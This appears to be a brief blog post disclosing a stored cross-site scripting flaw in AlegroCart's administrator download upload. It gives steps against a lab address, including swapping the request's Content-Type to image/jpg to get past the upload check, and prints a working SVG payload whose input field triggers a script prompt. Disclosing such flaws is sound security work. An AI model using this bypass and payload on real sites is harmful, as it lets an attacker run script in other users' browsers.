Description
- It was noted that the image upload functionality was vulnerable to XSS by uploading a specially crafted SVG image
XSS via SVG Image Upload
Steps to Reproduce:
- Visit http://192.168.58.129/alegrocart/administrator/?controller=download
- Upload SVG image file with the contents below
- Intercept the POST request and change the Content-Type to "Content-Type: image/jpg"
- Then visit "http://192.168.58.129/alegrocart/download/xss.svg" to trigger the XSS
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
<foreignObject width="100%" height="100%">
<body xmlns="http://www.w3.org/1999/xhtml">
<input type="text" onkeyup="prompt('XSS Triggered!')" placeholder="Type here..."/>
</body>
</foreignObject>
</svg>
No comments:
Post a Comment